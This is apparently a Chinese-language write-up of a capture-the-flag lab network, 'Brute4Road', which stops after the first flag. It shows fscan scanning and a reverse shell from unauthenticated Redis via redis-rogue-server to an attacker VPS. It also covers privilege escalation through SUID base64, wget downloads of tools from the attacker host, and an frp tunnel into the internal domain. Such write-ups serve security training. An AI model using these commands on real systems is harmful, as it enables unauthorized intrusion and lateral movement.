Brute4Road

flag1

先扫描一下外网

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
D:\shentou\fscan>fscan.exe -h 39.99.146.226

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
39.99.146.226:22 open
39.99.146.226:21 open
39.99.146.226:80 open
39.99.146.226:6379 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://39.99.146.226      code:200 len:4833   title:Welcome to CentOS
[+] ftp 39.99.146.226:21:anonymous
   [->]pub
[+] Redis 39.99.146.226:6379 unauthorized file:/usr/local/redis/db/dump.rdb

存在ftp匿名用户登录和redis未授权登录
ftp这个貌似没什么用
直接打redis主从复制,vps的9090端口起个监听

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
python3 redis-rogue-server.py --rhost 39.99.146.226 --rport 6379 --lhost 47.120.14.151 --lport 6666 --exp exp.so

| ___ \       | (_)     | ___ \                       /  ___|                         
| |_/ /___  __| |_ ___  | |_/ /___   __ _ _   _  ___  \ `--.  ___ _ ____   _____ _ __ 
|    // _ \/ _` | / __| |    // _ \ / _` | | | |/ _ \  `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \  __/ (_| | \__ \ | |\ \ (_) | (_| | |_| |  __/ /\__/ /  __/ |   \ V /  __/ |   
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_|    \_/ \___|_|   
                                     __/ |                                            
                                    |___/                                             
@copyright n0b0dy @ r3kapig

[info] TARGET 39.99.146.226:6379
[info] SERVER 47.120.14.151:6666
[info] Setting master...
[info] Setting dbfilename...
[info] Loading module...
[info] Temerory cleaning up...
What do u want, [i]nteractive shell or [r]everse shell: r
[info] Open reverse shell...
Reverse server address: 47.120.14.151
Reverse server port: 9090
[info] Reverse shell payload sent.
[info] Check at 47.120.14.151:9090
[info] Unload module...

vps的9090端口顺利接收到反弹过来的shell,创建一个伪终端

1
python -c 'import pty; pty.spawn("/bin/bash")'

在/home/redis/flag下找到flag01,但是需要提权

尝试suid提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
find / -perm -u=s -type f 2>/dev/null

/usr/sbin/pam_timestamp_check
/usr/sbin/usernetctl
/usr/sbin/unix_chkpwd
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chage
/usr/bin/base64
/usr/bin/umount
/usr/bin/su
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/crontab
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/pkexec
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/lib/polkit-1/polkit-agent-helper-1

可以用base64命令读取flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
base64 flag01|base64 -d

 ██████                    ██              ██  ███████                           ██
░█░░░░██                  ░██             █░█ ░██░░░░██                         ░██
░█   ░██  ██████ ██   ██ ██████  █████   █ ░█ ░██   ░██   ██████   ██████       ░██
░██████  ░░██░░█░██  ░██░░░██░  ██░░░██ ██████░███████   ██░░░░██ ░░░░░░██   ██████
░█░░░░ ██ ░██ ░ ░██  ░██  ░██  ░███████░░░░░█ ░██░░░██  ░██   ░██  ███████  ██░░░██
░█    ░██ ░██   ░██  ░██  ░██  ░██░░░░     ░█ ░██  ░░██ ░██   ░██ ██░░░░██ ░██  ░██
░███████ ░███   ░░██████  ░░██ ░░██████    ░█ ░██   ░░██░░██████ ░░████████░░██████
░░░░░░░  ░░░     ░░░░░░    ░░   ░░░░░░     ░  ░░     ░░  ░░░░░░   ░░░░░░░░  ░░░░░░ 


flag01: flag{08a51a88-49a1-4ae2-98fe-0a3350eb5252}

Congratulations! ! !
Guess where is the second flag?

接下来可以用wget下载fscan和frpc

1
2
3
wget http://47.120.14.151/fscan
wget http://47.120.14.151/frpc
wget http://47.120.14.151/frpc1.toml

看一下内网IP

1
2
3
hostname -i或者netstat -ano

172.22.2.7

fscan扫一下内网

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
./fscan -h 172.22.2.7/24 > 1.txt

start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.2.18     is alive
(icmp) Target 172.22.2.3      is alive
(icmp) Target 172.22.2.7      is alive
(icmp) Target 172.22.2.16     is alive
(icmp) Target 172.22.2.34     is alive
[*] Icmp alive hosts len is: 5
172.22.2.16:80 open
172.22.2.18:22 open
172.22.2.7:80 open
172.22.2.7:22 open
172.22.2.7:21 open
172.22.2.18:80 open
172.22.2.7:6379 open
172.22.2.16:1433 open
172.22.2.34:445 open
172.22.2.16:445 open
172.22.2.3:445 open
172.22.2.18:445 open
172.22.2.34:139 open
172.22.2.3:139 open
172.22.2.16:139 open
172.22.2.34:135 open
172.22.2.18:139 open
172.22.2.16:135 open
172.22.2.3:135 open
172.22.2.3:88 open
[*] alive ports len is: 20
start vulscan
[*] NetInfo 
[*]172.22.2.3
   [->]DC
   [->]172.22.2.3
[*] NetInfo 
[*]172.22.2.16
   [->]MSSQLSERVER
   [->]172.22.2.16
[*] NetBios 172.22.2.34     XIAORANG\CLIENT01             
[*] OsInfo 172.22.2.16  (Windows Server 2016 Datacenter 14393)
[*] OsInfo 172.22.2.3   (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.2.3      [+] DC:DC.xiaorang.lab               Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.2.16        code:404 len:315    title:Not Found
[*] NetInfo 
[*]172.22.2.34
   [->]CLIENT01
   [->]172.22.2.34
[*] NetBios 172.22.2.16     MSSQLSERVER.xiaorang.lab            Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.2.7         code:200 len:4833   title:Welcome to CentOS
[*] NetBios 172.22.2.18     WORKGROUP\UBUNTU-WEB02        
[+] ftp 172.22.2.7:21:anonymous 
   [->]pub
[*] WebTitle http://172.22.2.18        code:200 len:57738  title:又一个WordPress站点

整理一下信息
外网入口39.99.146.226,其内网IP是172.22.2.7,已经拿下
内网主机172.22.2.3为域控制器 DC.xiaorang.lab
内网主机172.22.2.16,MSSQLSERVER MSSQLSERVER.xiaorang.lab
内网主机172.22.2.18,80端口有wordpress服务 WORKGROUP\UBUNTU-WEB02
内网主机172.22.2.34,XIAORANG\CLIENT01

先做内网穿透,打一下wordpress
frpc1.toml

1
2
3
4
5
6
7
8
9
server_addr = 47.120.14.151
server_port = 7000

[[proxies]]
name = "wp"
type = "tcp"
localIP = "172.22.2.18"
localPort = 80
remotePort = 20022

nohup ./frpc -c ./frpc1.toml >/dev/null 2>&1 &

靶机炸了,未完待续

flag2

flag3

flag4